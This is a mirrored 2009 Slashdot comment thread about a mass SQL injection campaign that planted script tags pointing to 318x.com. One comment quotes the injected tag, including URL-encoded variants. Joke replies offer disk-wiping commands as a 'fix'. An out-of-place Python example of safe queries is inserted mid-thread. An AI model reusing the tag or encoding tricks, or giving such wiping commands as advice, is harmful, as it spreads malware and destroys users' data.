Slashdot Mirror


SQL Injection Attack Claims 132,000+

An anonymous reader writes "A large scale SQL injection attack has injected a malicious iframe on tens of thousands of susceptible websites. ScanSafe reports that the injected iframe loads malicious content from 318x.com, which eventually leads to the installation of a rootkit-enabled variant of the Buzus backdoor trojan. A Google search on the iframe resulted in over 132,000 hits as of December 10, 2009."


  1. hey by Spazztastic · · Score: 2, Funny

    Hey, I went to 318x.com and all of a sudden my computer is acting funny. Any suggestions?

    --
    Posts not to be taken literally. Almost everything is sarcasm.
    1. Re:hey by jo42 · · Score: 4, Funny

      dd if=/dev/zero of=/dev/sda bs=8192 will fix it.

    2. Re:hey by Yvan256 · · Score: 4, Funny

      Call a comedy club and get your computer on stage?

    3. Re:hey by unformed · · Score: 2, Funny

      dd: opening `/dev/sda` failed: Permission denied.

    4. Re:hey by Anonymous Coward · · Score: 2, Funny

      "'dd' is not recognized as an internal or external command, operable program or batch file."

      Still broken! =(

      Posting AC so I don't get modded to hell by people who either don't think that was funny or are simply incapable of recognizing a joke.

    5. Re:hey by Anonymous Coward · · Score: 2, Funny

      sudo !!

      sudo dd if=/dev/zero of=/dev/sda bs=8192

      Nope. Just says "Bad command or file name".

    6. Re:hey by blair1q · · Score: 2, Insightful

      that's the point

      it's not a security issue if you deliberately do something ignorant

      like, say, using the internet

      THE INTERNET IS NOT SECURE

      says so right on the packaging, and always has

    7. Re:hey by Arancaytar · · Score: 3, Funny

      I actually post all my comments via a dead-man's-switch proxy that logs my keystrokes in real time and submits the post once it detects inactivity. This way I can type things like Candlejack and still publish my po

    8. Re:hey by shutdown+-p+now · · Score: 2, Informative

      That one is outdated. What he needs is "rd /s/q C:\".

  2. Little Bobby Tables by bmearns · · Score: 2, Funny

    I blame Mrs. Roberts.

    --
    Slashdot is not a game, Slashdot is not a game. Crap, I just lost points.
  3. 318x.com by NoYob · · Score: 2, Interesting

    I tried to go there and I got this from Google: Diagnostic page for 318x.com

    After doing a whois, I see that just about all information is described as "Unknown"

    Why is this domain still in existence? Can ICANN take it down?

    It looks like the sole reason for this domain is for malware.

    --
    It's NOT me! It's the meds! I'm on 1000mg of Fukitol.
    1. Re:318x.com by NeverVotedBush · · Score: 2, Informative

      318x.com is now in my hosts file. Can at least try to protect ourselves...

  4. why don't these go away? by v1 · · Score: 3, Interesting

    If they know where the site is that's hosting the payload why don't they just shut them down? I realize the locations for the hosting are carefully chosen to provide maximum insulation, but still you'd expect that by now (years after this sort of thing became common) that there'd be mechanisms and procedures in place to break these down swiftly?

    --
    I work for the Department of Redundancy Department.
    1. Re:why don't these go away? by qazsedcft · · Score: 2, Insightful

      If it were kiddy porn it would be shutdown already.

    2. Re:why don't these go away? by jimicus · · Score: 3, Insightful

      You are assuming that all the systems are hosted at reputable hosting companies that pro-actively monitor all their systems.

      There are millions of systems worldwide that are exposed to the public internet (even though they probably shouldn't be) that are sitting in the corner somewhere waiting for someone to "get around to decommissioning them" - and in the meantime they're pumping out spam and taking part in DDoS attacks.

    3. Re:why don't these go away? by wowbagger · · Score: 2, Informative

      You must be new here, let me welcome you to "The Internet". I hope you enjoy your visit.

      Hosting companies don't give a pair of fetid dingo's kidneys about such matters, so long as the people responsible for the hosting pay good money.

      Even the hosting companies that claim to be anti-spam, and whose acceptable use policies state that ANY support of spam, including hosting spamvertized web sites, when confronted with multiple, on-going violations, will ignore all reports, remove all forum posts calling attention to those posts, and continue to cash the checks from the spammers.

    4. Re:why don't these go away? by Narcocide · · Score: 2, Insightful

      No you're wrong. People attack Windows because the most people use it AND it is conveniently also less inherently secure than anything else in current production. If everyone stopped using Windows and switched to XYZ then XYZ would eventually become the new biggest target, that is true but it is just as completely naive to assume the same percentage of attacks would be successful on an entirely different platform as Windows as it is to assume that you would have a remotely accurate clue about what that new percentage would be unless you were fluent in the use of "XYZ" which I'm assuming you are not because you can't even spell Linux right.

  5. Reminds me of xkcd by BountyX · · Score: 3, Funny

    Seriously people stop naming your kids with ');DROP TABLE at the end...

    --
    Trying to install linux on my microwave, but keep getting a kernel panic...
  6. Details? by HangingChad · · Score: 3, Insightful

    I love the way they fail to mention what server systems might be affected. Is it SQL Server? MySQL? .NET? PHP? Windows servers? Linux? Both? What web sites are vulnerable?

    It's always fun to snicker when you get to the registry entries which points to Windows. Although there was a trojan for Ubuntu in a desktop theme a few days ago, so enjoy the time to mock Windows users while it lasts.

    --
    That's our life, the big wheel of shit. - The Fat Man, Blue Tango Salvage
    1. Re:Details? by Yvan256 · · Score: 4, Insightful

      But a Trojan needs user access and approval to get installed. No OS on the planet can protect itself from a user with the admin password.

    2. Re:Details? by Bert64 · · Score: 4, Funny

      Windows 9x used to do a pretty good job, can't own a system once it's bluescreened.

      --
      http://spamdecoy.net - free throwaway anonymous email - avoid spam!
    3. Re:Details? by LordKaT · · Score: 5, Insightful

      Even still, this blog post is fucking useless. What CMS? What input is not being validated? Is it an underlying problem with Drupal? Wordpress? Joomla? What version?

      On top of that, it doesn't give any recommendations for what end users could do to protect themselves. Does anti-virus software already detect it? Can you simply alter your hosts file? Disable Javascript?

      The blog post is completely fucking useless.

    4. Re:Details? by necrogram · · Score: 2, Informative

      They didn't mention it because it doesn't matter. It's the result of bad coding practices. A SQL injection attack is caused by the front end application accepting whatever input it's given and using it to generate the SQL statements. You stop these attacks by sanitizing your input, use stored procedures to do the database work, and possibly stick in a middleware tier to handle database access, i.e. apache -> websphere -> database.

    5. Re:Details? by HangingChad · · Score: 2, Informative

      They didn't mention it because it doesn't matter. It's the result of bad coding practices.

      It does too matter. You don't infect 132,000 web sites with separate injection attacks. That's automated. A lot of the people running forums and CMS-driven web sites don't understand the code well enough to fix anything.

      Heck, one of my sites was hacked once, through the forum software. I'm not in the habit of combing through forum code looking for unvalidated inputs. So if someone could mention what the parent exploit is, what versions of that software are affected and whether the operating system makes a difference, then those same webmasters could make sure their software was up to date. This article describes the client exploit. I don't care about that, surf with Windows and that's going to happen. I do care that crap isn't originating with any of my web sites.

      --
      That's our life, the big wheel of shit. - The Fat Man, Blue Tango Salvage
    6. Re:Details? by lseltzer · · Score: 2, Insightful

      If it's really over 100,000 sites with the same attack then there's something obvious they have in common, like the same PHP/MYSQL library, and it has a predictable vulnerability in it.

  7. How is SQL involved? by Bromskloss · · Score: 3, Interesting

    The article said "SQL" in the headline, but never mentioned it again after that.

    --
    Swedish plasma phys. PhD student; MSc EE; knows maths, programming, electronics; finance interest; seeks opportunities
    1. Re:How is SQL involved? by jDeepbeep · · Score: 2, Interesting

      The article said "SQL" in the headline, but never mentioned it again after that.

      My guess is that the compromised websites all have something in common, such as running the same CMS for example. You're right though, the article is short on details of the injection itself.

      --
      Reply to That ||
    2. Re:How is SQL involved? by Gary+van+der+Merwe · · Score: 2, Informative

      On the server end there is a SQL injection exploit being used to get the malicious code out there.

      My point being that you don't need to do a SQL injection to do this.

      To prevent a SQL injection, you need to change ' to '' on input from the user that you pass to sql.

      To prevent a HTML+script injection, you need to change < to &lt;, > to &gt;, & to &amp; etc. on input from the user that is rendered to the browser. The sites in question are not doing this, hence, just stick the code you wish to inject into a comment or some other user field. This has nothing to do with SQL.

  8. The real problem by Anonymous Coward · · Score: 2, Informative

    So it's MS and Adobe vulnerabilities that actually let the malware onto your system.
    FTA:

    Observed exploits include:

            * Integer overflow vulnerability in Adobe Flash Player, described in CVE-2007-0071
            * MDAC ADODB.Connection ActiveX vulnerability described in MS07-009
            * Microsoft Office Web Components vulnerabilities described in MS09-043
            * Microsoft video ActiveX vulnerability described in MS09-032
            * Internet Explorer Uninitialized Memory Corruption Vulnerability – MS09-002.

  9. Re:Windoze by TheNinjaroach · · Score: 5, Informative

    All I can tell (from TFA), is it affects Windows servers.

    SQL injection attacks affect any number of platforms. It's not a Windows problem, it's not a database problem, it's a "we hired cheap, unskilled developers" problem.

    Now the people who browse these sites and get hit with malware, that looks to be specific to Windows.

    --
    I went to eat some animal crackers and the box said, "Do not eat if seal is broken." I opened the box and sure enough..
  10. Re:Windoze by jDeepbeep · · Score: 2, Informative

    Now the people who browse these sites and get hit with malware, that looks to be specific to Windows.

    Yeah. I saw my error after I had posted it, so I tried to correct it with a follow up.

    --
    Reply to That ||
  11. Obvious, but needs to be said by GreenTom · · Score: 4, Informative

    Add to windows\system32\drivers\etc\hosts:

    127.0.0.1 318x.com

    And you should be safe, for the moment.

  12. No... by Oxford_Comma_Lover · · Score: 3, Interesting

    The assumption is that once there are a hundred thousand servers hit, and maybe fewer, if the hosting company doesn't shut down the site within an hour or two a responsible upstream router blocks traffic from the site. Every delivered payload costs society more time and money.

    --
    -- IANAL, this isn't legal advice, and definitely isn't legal advice for you. Also, Squee!
  13. Let's say it all together now... by gregarican · · Score: 2, Interesting

    validate your SQL inputs before posting them against an Internet-facing database. This isn't an SQL problem. This isn't a Windows-based problem. This is a poor coders' problem. If there are high-profile websites that were compromised I'd be one pissed off PHB fo sho...

    1. Re:Let's say it all together now... by Vellmont · · Score: 3, Informative


      validate your SQL inputs before posting them against an Internet-facing database.

      Or simply use prepared statements (or whatever the equivalent term is in your language of choice). Prepared statements are far safer and easier than trying to validate all the current potential and future potential for breaking out of a SQL statement. It won't protect you from people putting in their own parameters into your SQL statement (like say someone else's userID), but that's a different class of vulnerability.

      --
      AccountKiller
  14. Re:Windoze by gregarican · · Score: 2, Insightful

    Uhhhhh, you really RTFA? It doesn't matter what the server is running to get compromised by an SQL injection, does it? Could be MySQL running on a RedHat server. Could be SQL Server running on a Windows server. Why would an SQL injection be platform-dependent? After all, isn't that why SQL is ANSI and _relatively_ portable between platforms? I did say "relatively" of course ::rollseyes::

  15. Re:AV Detection by REggert · · Score: 2, Informative

    according to TFA:

    Malware description

    Threatname: Backdoor.Win32.Buzus.croo

    Aliases: Trojan-PWS.Win32.Lmir (Ikarus, a-squared); TR/Hijacker.Gen (AntiVir); Trojan/Win32.Buzus.gen (Antiy-AVL); W32/Agent.S.gen!Eldorado (F-Prot, Authentium); Win32:Rootkit-gen (Avast); Generic15.CBGO (AVG); Trojan.Generic.2823971 (BitDefender, GData); Trojan.Buzus.croo (Kaspersky, QuickHeal); Trojan.NtRootKit.2909 (DrWeb); Trj/Buzus.AH (Panda).

    That's the trojan that's being installed by the exploits served up by the injected IFRAME. It is not the vulnerability that is allowing the IFRAME to be injected to begin with.

    --

    cp /dev/zero ~/signature.txt

  16. Terrible article, inappropriate headline by erroneus · · Score: 2, Interesting

    The sources of the attacks are servers that have been compromised through SQL injection. I get that. It's an important detail. They fail to identify what sites and/or what those sites are running that is exploitable in this way. Is it MySQL? Is it MS SQL? Oracle? Is it a particular software package running on a particular web host platform? The questions are too many and should have been answered in the article.

    What is done after a server is compromised is pretty common. Microsoft components, especially those linked through ActiveX, have been not just a hole in Microsoft security, but a tunnel into the Windows kernel big enough to drive a truck through. A vulnerability in Adobe flash is only a problem when it uses ActiveX to get there. Flash running in other ways does not seem to pose such an extreme threat otherwise. But while these are important security concerns to be aware of, it has nothing to do with the topic of the story as indicated by the headline or the first line of the story which is about compromised SERVERS, not about compromised clients.

  17. 132,000? Try 1269. by milesw · · Score: 2, Interesting

    As many have pointed out, the blog post does not offer sufficient detail, but does offer the rather sensational headline "SQL injection attack claims 132,000+". The Google Safe Browsing diagnostic page for 318x.com has it closer to 1200 or so:

    http://google.com/safebrowsing/diagnostic?site=318x.com/

    Has this site acted as an intermediary resulting in further distribution of malware?
    Over the past 90 days, 318x.com appeared to function as an intermediary for the infection of 1202 site(s) including 37y.org/, jxagri.gov.cn/, glojj.com/.

    Has this site hosted malware?
    Yes, this site has hosted malicious software over the past 90 days. It infected 1269 domain(s), including 37y.org/, cec.org.cn/, jxagri.gov.cn/.

  18. Re:Lame coders who don't care about security! by DNX+Blandy · · Score: 3, Insightful

    Very true, at which point this function simply doubled up the string delimiters, breaking the SQL injection. The major problem with Classic ASP was the casting of variables, if not done properly you were asking for it. If it's numeric, check it. .NET does not suffer from this problem unless the coder specifically passes a numeric value through to an SQL statement as a string, which would be stupid. If everyone used stored procedures to deal with the SQL data, none of this would happen. My above checks alert you to the fact that someone is having a go, you can't do that when checking for string delimiters as they are valid characters, but yes, if your code uses a shitty "execute" command, check it. If you use proper stored procedures, this will not affect you.

  19. SQL injections? Are those for H1N1? by fortapocalypse · · Score: 2, Funny

    Oops. Send those SQL injections back. We don't need them.

  20. Re:SQL injection portability by butlerm · · Score: 2, Informative

    For various reasons, an SQL injection generally targets a specific application running on a specific database. Unless your database interface is seriously deficient, like MS SQL server, it is difficult to perform a successful SQL injection without knowing what the table structure is. And of course, most applications do not run on multiple database types.

  21. Re:Lame coders who don't care about security! by shutdown+-p+now · · Score: 2, Insightful

    You don't need stored procedures, all you need are parametrized statements/commands, so long as your API provides it. And plain ADO, which was used with classic ASP, did provide parametrized commands.

    Any attempt to defeat SQL injection by blacklisting syntax is inherently error-prone if only because it may break on a future version of database (when its syntax gets extended). Not to mention that, unless you have perfect knowledge of 100% of the SQL dialect that your implementation uses, you may forget to blacklist some corner case.

    In short, if you use text substitution to counter SQL injection, you're not doing it right.
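The advice in this sub-thread (comment 7.2's ' to '' rule and HTML escaping, the prepared-statement point in comments 13.1 and 21, and "if it's numeric, check it" from comment 18), worked through as one added example. This is my code, not from the article or any commenter; the pages table and its rows are constructed, and Python's sqlite3 stands in for whatever database the compromised sites actually ran.

```python
import html
import sqlite3

# Constructed sample data standing in for a CMS's page table (not from the article).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO pages VALUES (1, 'Education');
        INSERT INTO pages VALUES (2, 'Letters');
    """)
    return conn

def vulnerable_lookup(conn, page_id):
    # The untrusted ?id= value is pasted straight into the query text. The context is
    # numeric, so there are no quotes to double: the ' -> '' trick cannot help here.
    sql = "SELECT title FROM pages WHERE id = " + page_id
    return [row[0] for row in conn.execute(sql)]

def safe_lookup(conn, page_id):
    # "If it's numeric, check it": reject anything that is not an integer, then bind
    # it as a parameter so the driver never lets the value become SQL syntax.
    pid = int(page_id)  # raises ValueError for input such as "1 OR 1=1"
    return [row[0] for row in conn.execute(
        "SELECT title FROM pages WHERE id = ?", (pid,))]

def safe_search(conn, fragment):
    # String context: with a bound parameter no quote doubling is needed; the driver
    # handles quoting, so a title like O'Brien or a <script> tag is just data.
    return [row[0] for row in conn.execute(
        "SELECT title FROM pages WHERE title LIKE ?", ("%" + fragment + "%",))]

def render_title(title):
    # Output encoding, the other half of the thread's point: whatever was stored,
    # including an injected <script src=...> tag, is displayed as text, not executed.
    return "<h1>" + html.escape(title) + "</h1>"

if __name__ == "__main__":
    db = make_db()
    print(vulnerable_lookup(db, "1"))
    print(vulnerable_lookup(db, "1 OR 1=1"))  # query meaning changed: every row comes back
    try:
        safe_lookup(db, "1 OR 1=1")
    except ValueError as exc:
        print("rejected:", exc)
    print(safe_search(db, "Let"))
    print(render_title("Education<script src=http://318x.com></script>"))
```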

  22. Re:Probably the Asprox botnet. by jbezorg · · Score: 2, Informative

    I concur. Searching for the iframe script, this is what I found. Sorry if I can't say if it's something like dotnet nuke. The occasional coldfusion page also has me wondering.

    From the first page of a google search for "<script src=http://318x.com></script>":

    City of Iowa City<script src=http://318x.com></script> - How to ...
    Microsoft VBScript runtime error '800a000d'. Type mismatch: '[string: "1035<script src=http"]'. /default/templates/top2.asp, line 60.
    www.icgov.org/default/?id=1787

    www.icgov.org:80
    GET / HTTP/1.1

    HTTP/1.1 400 Bad Request
    Server: Microsoft-IIS/5.0
    Date: Thu, 10 Dec 2009 20:29:42 GMT
    Connection: close
    Content-Length: 4009
    Content-Type: text/html

    YEMEN TIMES : Education
    Opportunities<script src=http://318x.com></script> Letters<script src=http://318x.com></script> Archive<script src=http://318x.com></script> ...
    www.yementimes.com/DEFAULTSUB.ASPX?pnc=57&pnm... - Cached

    IWCS - Learning<script src=http://318%78.com></script><script src ...
    Membership<script src=http://318%78.com></script><script src=http://318x.%63om></script> IWCS Shared Channels<script src=http://318%78.com></script><script ...
    www.iwcs.com/category.cfm?Category=2932

    --
    I've lost all my marbles except one & It's fun to test angular & centripetal acceleration in my skull